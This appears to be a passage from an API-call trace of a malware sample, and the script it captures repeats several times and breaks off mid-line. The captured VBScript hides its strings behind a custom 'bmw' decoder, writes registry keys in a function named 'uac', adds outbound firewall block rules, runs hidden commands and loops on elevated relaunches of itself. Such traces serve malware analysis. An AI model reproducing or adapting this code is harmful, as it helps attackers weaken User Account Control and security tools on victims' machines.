bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.010] wcsncmp (_String1="If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 60 [0223.010] wcsncmp (_String1="f\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89 [0223.010] wcsncmp (_String1="\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 39 [0223.010] wcsncmp (_String1="\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0223.010] wcsncmp (_String1="Next\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 